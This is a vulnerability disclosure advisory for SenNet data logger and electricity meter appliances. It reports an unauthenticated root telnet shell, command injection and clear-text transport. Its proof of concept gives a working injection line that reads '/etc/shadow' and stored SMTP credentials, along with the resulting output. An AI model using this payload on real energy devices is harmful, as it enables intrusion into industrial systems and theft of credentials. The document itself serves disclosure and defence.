SenNet Data Logger appliances and Electricity Meters Multiple
Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT
Advisory.

About
SenNet is a trademark of Satel Spain that offers monitoring and
remote-control solutions for businesses. Our engineers develop, integrate
and test the products of SenNet in our facilities in Madrid (Spain).

http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography
Americas and Europe regions

Target Audience / Industry
Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and
therefore, all SenNet models, and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar
Datalogger Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal
Datalogger Model: OWA31
Serial Number: A05B89
License type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter
Datalogger Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity,
gas, water) and other variables (temperature, humidity, presence, lighting
a|); both for industries and for businesses in the tertiary sector.

http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of
power generation plants. In this type of facilities, it is essential to
monitor and remotely control the devices involved in the process:
inverters, meters, trackers, etc.

http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell
The appliance runs ARM as underlying OS. Telnet access is enabled on TCP
port 5000. There is no authentication required for accessing and connecting
the remote shell. Any user can connect to the shell and issue commands.

2. Shell services running with excessive privileges (superuser)
The service runs with superuser root privileges, thus giving privileged
access to any user, without any authentication (exploited via OS Command
Injection described nexe).

3. OS Command Injection
The remote shell (attempts to) offer a restricted environment, and does not
allow executing system commands. However, it is possible to break out of
this jailed shell by chaining specific shell meta-characters and OS
commands.

The service / application is run as 'root' and OS command injection results
in full system access.

Apart from energy logging data, the device stores sensitive information
such FTP, SMTP and other service login credentials, used by the application
for functions, as well as to connect with other external, public facing
servers.

PoC:

# telnet IP 5000 2>/dev/null
Trying IP...
Connected to IP.
Escape character is '^A'.
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
/bin/sh: $: not found
uid=0(root) gid=0(root)
/home
root:$1$<removed-for-report>:13852:0:99999:7:::
nobody:*:13852:0:99999:7:::
nfsnobody:!!:13852:0:99999:7:::
  PID USER       VSZ STAT COMMAND
    1 root      2412 S    init
    2 root         0 SW   AkthreaddA
    3 root         0 SW   Aksoftirqd/0A
<snip>
root=postmaster
mailhub=<removed>:25
rewriteDomain=example.com
hostname=_HOSTNAME_
<snip>

4. Insecure Transport - all communications are clear-text, and prone to
sniffing.

+++++
Metasploit module will be released shortly.
+++++